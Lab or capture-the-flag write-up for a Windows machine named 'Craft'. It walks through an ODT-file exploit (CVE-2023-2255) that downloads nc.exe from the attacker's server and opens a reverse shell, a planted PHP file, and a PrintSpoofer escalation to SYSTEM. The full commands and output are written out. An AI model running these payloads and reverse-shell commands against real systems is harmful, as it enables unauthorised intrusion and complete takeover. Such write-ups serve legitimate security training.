Machine Information
- Machine Name: Craft
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
Nmap scan report for 192.168.188.169
Host is up, received user-set (0.016s latency).
Scanned at 2024-10-04 13:51:39 +08 for 109s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Craft
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
Since only port 80 open, this should be the go to port to get a shell.
Port 80
There’s a file upload function in the main page. Time to try uploading random files.
It seems that it only accept ODT file, I have no idea whats that. So its googling time. After looking for awhile, I notice this github repo that looks promising while creating an odt file for me. So lets try and see if it works.
1
2
python3 CVE-2023-2255.py --cmd "curl 192.168.45.205:8000/windows/nc.exe -o C:\Users\Public\nc.exe" --output 1.odt
File 1.odt has been created !
After creating the 1.odt file, upload it and check if it actually execute it.
I’m using a simple web server from python to see if it actually execute the code created using the CVE exploit.
1
2
3
4
uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.108.169 - - [05/Oct/2024 20:47:21] "GET /windows/nc.exe HTTP/1.1" 200 -
It successfully execute the command using the CVE exploit. With this, I could just gain a reverse shell by doing the same method.
1
2
python3 CVE-2023-2255.py --cmd "C:\Users\Public\nc.exe 192.168.45.205 1234 -e cmd" --output 1.odt
File 1.odt has been created !
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.205] from (UNKNOWN) [192.168.108.169] 49933
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
craft\thecybergeek
Since I’m not administrator user, its time to perform privilege escalation.
Privilege Escalation
I tried running winpeas but did not get anything useful. I noticed that in C:\Users directory, there’s a directory for apache.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\Users
07/13/2021 03:35 AM <DIR> .
07/13/2021 03:35 AM <DIR> ..
05/28/2021 03:53 AM <DIR> Administrator
07/13/2021 03:19 AM <DIR> apache
10/05/2024 05:45 AM <DIR> Public
07/13/2021 03:35 AM <DIR> thecybergeek
0 File(s) 0 bytes
6 Dir(s) 10,708,598,784 bytes free
According to the exploit that I used to get shell, it seems like something related to LibreOffice instead of web exploit itself. If that’s that case, I might able to get apache user if I manage to write a vulnerable php file that execute in the website. First, I’ll need to make sure that I could write a file in the directory that I could execute in the website.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\xampp\htdocs>icacls .
icacls .
. CRAFT\apache:(OI)(CI)(F)
CRAFT\apache:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\xampp\htdocs>icacls uploads
icacls uploads
uploads CRAFT\thecybergeek:(OI)(CI)(F)
CRAFT\apache:(OI)(CI)(F)
CRAFT\apache:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
Based on the result, I do not have any access on the C:\xampp\htdocs\ directory but I have full access on C:\xampp\htdocs\uploads\ directory. This means that I could write a file in it which will be shown in the website.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\xampp\htdocs\uploads>curl 192.168.45.205:8000/vuln.php -O
curl 192.168.45.205:8000/vuln.php -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 29 100 29 0 0 29 0 0:00:01 --:--:-- 0:00:01 935
C:\xampp\htdocs\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\xampp\htdocs\uploads
10/05/2024 06:04 AM <DIR> .
10/05/2024 06:04 AM <DIR> ..
10/05/2024 06:04 AM 29 vuln.php
1 File(s) 29 bytes
2 Dir(s) 10,702,843,904 bytes free
I successfully added my own vulnerable php file into it. Now its time to execute it in website and see if I could run as another user.
This shows that I could get another user. Time to get reverse shell for user apache.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
rlwrap nc -nvlp 1235 21:07:34 [2/14]
listening on [any] 1235 ...
connect to [192.168.45.205] from (UNKNOWN) [192.168.108.169] 50080
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami
whoami
craft\apache
C:\xampp\htdocs\uploads>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============ ============================================
craft\apache S-1-5-21-537427935-490066102-1511301751-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
After getting the apache user, I have a look at the privilege that apache user has. It seems like it has SeImpersonatePrivilege which means I could just get administrator shell using potatos attacks. I will be using printspoofer.exe.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
C:\Users\Public>curl 192.168.45.205:8000/windows/potato/print32.exe -O
curl 192.168.45.205:8000/windows/potato/print32.exe -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 22016 100 22016 0 0 22016 0 0:00:01 --:--:-- 0:00:01 346k
C:\Users\Public>.\print32.exe -i -c cmd
.\print32.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Tada ~ thats how I get NT Authority System.
Things I learned from this machine
- take good look at the numbers of users as it might be useful
- try to check for writable files that could execute in website
- odt RCE is interesting